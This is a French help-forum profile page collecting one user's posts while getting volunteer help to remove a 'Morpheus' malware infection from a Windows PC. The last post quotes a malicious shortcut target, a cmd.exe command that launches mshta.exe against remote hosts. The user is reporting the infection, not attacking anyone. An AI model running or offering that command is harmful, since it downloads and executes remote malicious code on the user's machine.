Aller au contenu

belo71

Membres
  • Compteur de contenus

    211
  • Inscription

  • Dernière visite

  • Jours gagnés

    2

Tout ce qui a été posté par belo71

  1. Bonjour, J'ai suivi vos conseils : - je ne vois rien à la ligne cible des raccourcis de navigateurs : copie d'écran - je poste le rapport de shortcut cleaner Je n'ai pas eu de popup à l'ouverture des navigateurs aujourd'hui... Je les réinitialise. Merci beaucoup pour votre aide. Jean Sébastien.
  2. Euh oui, mais j'ai un petit cerveau et tout ce qui est expliqué demande du temps à comprendre. Et le temps peut aussi être un ami pour ça, dans une société où on est à 100000 à l'heure en permanence. Par ailleurs, j'ai eu le temps de lire, mais pas de mettre en application. La vie nous amène parfois un peu loin des écrans... en famille par exemple. Votre aide est géniale car cela me permet d'apprendre plein de choses. Merci beaucoup.
  3. oki : je regarde ça dès que j'ai un moment. Windows 8 m'est inconnu alors il faut que je me familiarise... Merci pour votre aide très précieuse.
  4. Ben non on dirait que c'est pas propre... Il y a une fenêtre qui a popé à l'ouverture de firefox... Voici la copie d'écran
  5. Bonjour, Merci pour le retour rapide... Je poste les deux rapports : ZHPFixReport SFTGC Merci encore. Jean Sébastien.
  6. Et le dernier rapport de ZHPdiag J'ai déjà plus de popups toutes les 30 secondes : ça a l'air d'être déjà plus calme... Merci encore pour votre aide. Jean Sébastien.
  7. Et hop sccleaner le rapport 6 Et navigateur réinitialisé...
  8. Coucou, Et voilà MBAM a passé l'ordi à la moulinette... Le rapport 4 Le rapport 5 La suite arrive... Grand merci, Jean Sébastien.
  9. Je rentre chez moi et je termine tout ça ce soir ou demain. Merci pour votre aide.
  10. Coucou, Le rapport 3 Ca avance vite... Grand merci, Jean Sébastien.
  11. Coucou, Le rapport 1 Le rapport 2 Je continue... Grand merci. A bientôt, Jean Sébastien.
  12. Bonjour, J'ai récupéré un ordinateur infecté par un malware. J'ai fait tourner malawarebyte antimalware. Voilà le rapport : http://cjoint.com/?CKhpNUw6mCt Merci d'avance pour votre aide... Bien cordialement, Jean Sébastien.
  13. Bonsoir Apollo, J'ai abandonné... (( Merci pour ton aide.
  14. Salut Apollo Est-ce que tu peux me renvoyer le lien vers sft.exe de Pierre13 stp ? merci, belo71.
  15. Oui Dylav, bien sûr. Finalement, j'ai opéré une restauration du système. Merci beaucoup pour votre aide.
  16. Merci pour le coup de main... Je crois que je vais opérer une restauration du système à partir du disque qui m'a été fourni avec l'ordinateur. Ce sera plus simple. Merci bcp pour l'aide. A bientôt, Belo.
  17. Il y a toujours un souci au démarrage...
  18. Voilà le rapport 1. ========================= SEAF 1.0.1.0 - C_XX 2. 3. Commencé à: 22:29:31 le 19/04/2012 4. 5. Valeur(s) recherchée(s): 6. morpheus 7. 8. Légende: TC => Date de création, TM => Date de modification, DA => Dernier accès 9. 10. (!) --- Calcul du Hash "MD5" 11. (!) --- Informations supplémentaires 12. (!) --- Recherche registre 13. 14. ====== Fichier(s) ====== 15. 16. Aucun fichier trouvé 17. 18. 19. ====== Entrée(s) du registre ====== 20. 21. Aucun élément dans le registre trouvé 22. 23. ========================= 24. 25. Fin à: 22:34:46 le 19/04/2012 26. 434446 Éléments analysés 27. 28. ========================= 29. E.O.F
  19. Voilà le rapport. La fenêtre qui pope à chaque démarrage/redémarrage a encore popé... Et en plus, il y a des raccourcis qui sont apparus intempestivement : C'est pas fini !!!
  20. Voilà pour le rapport Merci beaucoup pour ton aide.
  21. Merci pour le topo Pear. Là, j'ai toujours les mêmes soucis : - dans le menu contextuel - au démarrage, j'ai toujours une fenêtre qui s'ouvre avec les références à Morpheus :
  22. J'ai un message qui apparaît : Par ailleurs, cet épisode infectieux a modifié le menu contextuel lorsqu'on clique droit sur les dossiers : Je n'ose pas cliquer sur "Abrir carpeta" de peur de relancer l'épisode infectieux. Comment faire pour nettoyer ce menu contextuel ?
  23. A priori il semble que c'est l'antivirus (avira) qui bloque l'écriture sur le fichier... IL faut passer en mode expert et autoriser les modifications sur le fichier hôte
  24. Bonjour Pear, J'ai un petit souci. J'ai ouvert le dossier windows/system32/drivers/etc J'ai cliqué droit sur le fichier Hosts et décoché lecture seule. Ensuite, il faut copier/coller ce qui suit : mais où dois-je le copier ? Dans le fichier Hosts ? Avec quel éditeur dois-je l'ouvrir ? J'ai essayé avec bloc-notes et wordpad, mais j'ai un message d'erreur : Que fais-je donc alors ? Belo.
  25. Les images sont des miniatures : il faut cliquer dessus, puis une fois sur le site qui les héberge il faut cliquer à nouveau dessus. Oui il y a des raccourcis pourris dans Menu démarrer/Tous les programmes. Quand je passe la souris dessus, ça dit "carpeta de archivo". J'ai eu la curiosité d'interroger les liens vers lesquels ils renvoient en regardant dans propriétés : ils renvoient à C:\Windows\system32\cmd.exe /c START mshta.exe "h t t p://187.157.146.149:102/m0rpheus/morpheus2010/msnmsgr.tpl?reload=1334732600318" & start mshta.exe ht tp://morpheus2010.100webspace.net/check2.htm h tt p://morpheus2010.100webspace.net/check2.htm & start %windir%\explorer.exe "C:\Users\marie-caroline\AppData\ C'est ce qui me fait ouvrir des fenêtres intempestives, créer des raccourcis sur le bureau et démarrer msn... D'après mes recherches il pourrait s'agir d'un ver Win32/Clofect.A (sources : http://www.eset.eu/encyclopaedia/win32-clofect-a-vipantispyware?lng=en ou http://www.threatexpert.com/report.aspx?md5=ff3c6aad8a1a86520c7d0f5e1fc0de6e) Merci pour le coup de main. Belo.
×
×
  • Créer...